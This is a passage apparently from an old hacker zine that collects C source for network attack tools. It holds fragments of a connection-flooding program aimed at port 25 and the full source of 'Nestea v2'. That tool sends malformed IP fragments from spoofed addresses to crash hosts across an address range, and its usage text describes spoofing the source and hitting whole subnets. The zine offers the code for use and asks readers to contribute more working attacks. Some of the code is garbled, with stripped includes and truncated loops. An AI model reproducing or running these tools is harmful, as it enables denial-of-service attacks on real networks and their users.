0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3 }; char *temp; if(argc<2) usage(); signal(SIGPIPE,(void (*)())exitprog); signal(SIGHUP,(void (*)())exitprog); signal(SIGINT,(void (*)())exitprog); signal(SIGTERM,(void (*)())exitprog); signal(SIGBUS,(void (*)())exitprog); signal(SIGABRT,(void (*)())exitprog); signal(SIGSEGV,(void (*)())exitprog); server.sin_family=AF_INET; printf("\nConnecting..."); fflush(stdout); for(;x #include #include /* needed for Irix */ #include #include #include #include /* needed for Irix */ #include #include #include #define MAX_DESCRIPTORS 256 int i, fd; main(argc,argv) int argc; char *argv[]; { int opt,pid; struct sockaddr_in sin; char buf[2]; struct hostent *he; if( argc < 2 ) { printf("Usage:\t%s address [port]\n", argv[0] ); printf("\twhere address is an internet address\n"); printf("\tand port is an optional port number (default=25)\n"); exit (0); } pid = getpid(); opt = 1; if((he=gethostbyname(argv[1]))==NULL) { herror("gethostbyname"); exit(1); } bzero((char *)&sin, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr = *((struct in_addr*)he->h_addr); sin.sin_port = htons((argc > 2) ? atoi(argv[2]) : 25); for(i=0;i #include #include #include #include #include #include #include #include #include #include #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define MAGIC2 108 #define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. to be safe, we should hit them till they die :> */ struct ipstuph { int p1; int p2; int p3; int p4; } startip, endip; void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock, j, bequiet = 0; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; char hit_ip[18], dst_ip2[18]; struct in_addr addr; fprintf(stderr, "\nNestea v2 originally by: humble + ttol mods\n"); fprintf(stderr, "Color and Instructions was done by : ttol\n"); fprintf(stderr, "Note : ttol released Nestea v2. humble had nothing to do with \n it, don't nag him about it. -ttol@ttol.net\n\n"); if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 4) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } strcpy(dst_ip2,argv[3]); if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3, &startip.p4) != 4) { fprintf(stderr, "Error, arg2(startip) : Need an ip that contains 4 zones\n"); exit(1); } if (startip.p1 > 255) { fprintf(stderr, "Error : Zone 1 of start ip is incorrect \ (greater than 255)\n"); exit(1); } if (startip.p2 > 255) { fprintf(stderr, "Error : Zone 2 of start ip is incorrect \ (greater than 255)\n"); exit(1); } if (startip.p3 > 255) { fprintf(stderr, "Error : Zone 3 of start ip is incorrect \ (greater than 255)\n"); exit(1); } if (startip.p4 > 255) { fprintf(stderr, "Error : Zone 4 of start ip is incorret \ (greater than 255)\n"); exit(1); } if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3, &endip.p4) != 4) { fprintf(stderr, "Error, arg3(endip) : [[0;34mNeed an ip that \ contains 4 zones[[0m\n"); exit(1); } if (endip.p1 > 255) { fprintf(stderr, "Error : Zone 1 of end ip is incorrect \ (greater than 255)\n"); exit(1); } if (endip.p2 > 255) { fprintf(stderr, "Error : Zone 2 of end ip is incorrect \ (greater than 255)\n"); exit(1); } if (endip.p3 > 255) { fprintf(stderr, "Error : Zone 3 of end ip is incorrect (greater than 255)\n"); exit(1); } if (endip.p4 > 255) { fprintf(stderr, "Error : Zone 4 of end ip is incorrect (greater than 255)\n"); exit(1); } if (startip.p1 != endip.p1) { fprintf(stderr, "Error : Zone 1 of start ip and end ip is different\n"); exit(1); } if (startip.p2 != endip.p2) { fprintf(stderr, "Error : Zone 2 of start ip and end ip is different\n"); exit(1); } if (startip.p3 != endip.p3) { fprintf(stderr, "Error : Zone 3 of start ip and end ip is different\n"); exit(1); } while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; case 'q': /* quiet mode */ bequiet = 1; break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Death on flaxen wings (yet again):\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s - %s.%d\n", inet_ntoa(addr), dst_ip2, dst_prt); fprintf(stderr, " Amt: %5d\n", count); if (bequiet) fprintf(stderr, "[quiet mode] Each'.' represents a nuked ip. ["); for (j=startip.p4; j <= endip.p4; j++) { sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j); if (!(bequiet)) fprintf(stderr, "%s [ ", hit_ip); if (!(dst_ip = name_resolve(hit_ip))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); if (!(bequiet)) fprintf(stderr, "d00m "); usleep(500); } if (bequiet) fprintf(stderr, "."); else fprintf(stderr, "]\n"); } if (bequiet) fprintf(stderr, "]\n"); return (0); } void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { int i; u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; packet = (u_char *)malloc(IPH + UDPH + PADDING+40); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40); byte = 0x4F; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 44; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ for(i=0;ih_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "nestea2 source startIP endIP [-s src port] [-t dest port] [-n quantity] [-q]\n"); fprintf(stderr, "source : This is the source IP to nestea from, make it a spoof\n"); fprintf(stderr, "startIP : From which IP should we start from? (eg 153.35.85.1)\n"); fprintf(stderr, "endIP : From which IP should we end with? (eg 153.35.95.255)\n"); fprintf(stderr, "src port : This is the source port to spoof from (OPTIONAL)\n"); fprintf(stderr, "dest port: This is the destination port to nestea to (OPTIONAL)\n"); fprintf(stderr, "quantity : This is how many times to nestea the victim (perfered is 1000)\n"); fprintf(stderr, "-q : This is quiet mode so you don't see the d00m's\n\n"); fprintf(stderr, "Example : nestea2 127.0.0.1 153.35.85.1 153.35.85.255 -n 1000\n"); fprintf(stderr, "The above was to hit a whole Class C of 153.35.85 with the return \naddress from 127.0.0.1 doing it 1000 times\n"); fprintf(stderr, "Example2 : nestea2 153.35.85.32 153.35.85.32 153.85.35.32 -n 1000\n"); fprintf(stderr, "The above was to hit 153.35.85.32 with the source 153.35.85.32 \ndoing it 1000 times\n"); fprintf(stderr, "I perfer example2, probably because it is the lazy man's way out\n\n"); fprintf(stderr, " NOT TO BE DISTRIBUTED!\n"); exit(0); } That's about most of it..... If you need more, try seaching the web... If you have something there isn't here, mail it to us... if it works, we'll include it in our next issue...